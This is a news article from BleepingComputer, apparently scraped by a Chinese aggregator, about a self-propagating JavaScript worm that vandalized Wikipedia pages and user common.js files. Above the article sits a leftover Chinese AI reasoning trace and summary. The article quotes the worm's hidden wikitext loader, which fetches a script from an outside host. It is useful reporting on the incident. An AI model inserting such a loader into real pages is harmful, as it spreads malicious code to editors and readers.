Wikipedia hit by self-propagating JavaScript worm that vandalized pages
嗯,用户让我用中文总结一下这篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头,直接写描述。好的,我得先仔细阅读一下文章。 文章讲的是维基媒体基金会遭遇了一次安全事件,一个自我传播的JavaScript蠕虫开始破坏页面和修改用户脚本。编辑们首先在Wikipedia的Village Pump(技术版块)报告了这个事件,用户注意到大量自动编辑添加隐藏脚本和破坏随机页面。维基媒体工程师暂时限制了编辑权限以调查攻击并开始撤销更改。 这个JavaScript蠕虫是怎么来的呢?根据Phabricator的问题追踪器,恶意脚本托管在俄罗斯维基百科上被执行,导致维基百科上的全局JavaScript脚本被修改为恶意代码。这个恶意脚本是User:Ololoshka562/test.js上传的,最早是在2024年3月上传的,并且与之前攻击维基项目的脚本有关联。 BleepingComputer的审查显示,这个脚本通过注入恶意JavaScript加载器到登录用户的common.js和维基百科的全局MediaWiki:Common.js中进行自我传播。MediaWiki允许全局和用户特定的JavaScript文件,这些文件在编辑器的浏览器中执行以自定义Wiki界面。 一旦初始test.js脚本在一个登录编辑器的浏览器中加载,它会尝试使用该编辑器的会话和权限修改两个脚本:用户级别的持久性和站点范围内的持久性。如果全局脚本被成功修改,任何人加载它都会自动执行加载器,重复相同步骤,并感染自己的common.js。 此外,该脚本还具有功能来编辑随机页面,在页面中插入图片和隐藏的JavaScript加载器。根据分析,大约有3996个页面被修改,85个用户的common.js文件被替换。工程师们暂时限制了编辑权限,并删除了注入脚本的引用。维基媒体基金会员工还回滚了平台上许多用户的common.js修改。 现在注入代码已被移除,编辑功能再次可用。但维基媒体尚未发布详细的事件后报告解释恶意脚本是如何被执行以及蠕虫传播有多广。 总结一下:文章描述了维基媒体因恶意JavaScript蠕虫遭受攻击的情况,包括蠕虫传播机制、影响范围及应对措施。 </think> 维基媒体基金会遭遇安全事件:一个自我传播的JavaScript蠕虫破坏多语言维基百科页面并修改用户脚本。恶意代码从俄罗斯维基百科上传播至全球项目,在数千个页面插入隐藏脚本并 vandalize 随机内容。工程师临时限制编辑以修复问题,并回滚受影响用户的个性化 JavaScript 文件。目前攻击已受控但未公布详细报告解释事件原因及影响范围。 2026-3-5 20:45:13 Author: www.bleepingcomputer.com(查看原文) 阅读量:11 收藏

Wikipedia

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.

Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm

According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:

  • User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
  • Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.
Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Source: BleepingComputer

If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

A Wikimedia user's infected common.js script
A Wikimedia user's infected common.js script
Source: BleepingComputer

The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>

According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

Pages modified by JavaScript worm
Pages modified by JavaScript worm
Source: BleepingComputer

As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

BleepingComputer contacted Wikimedia with questions about the incident, but has not received a reply at this time.

tines

Red Report 2026: Why Ransomware Encryption Dropped 38%

Malware is getting smarter. The Red Report 2026 reveals how new threats use math to detect sandboxes and hide in plain sight.

Download our analysis of 1.1 million malicious samples to uncover the top 10 techniques and see if your security stack is blinded.


文章来源: https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/
如有侵权请联系:admin#unsafe.sh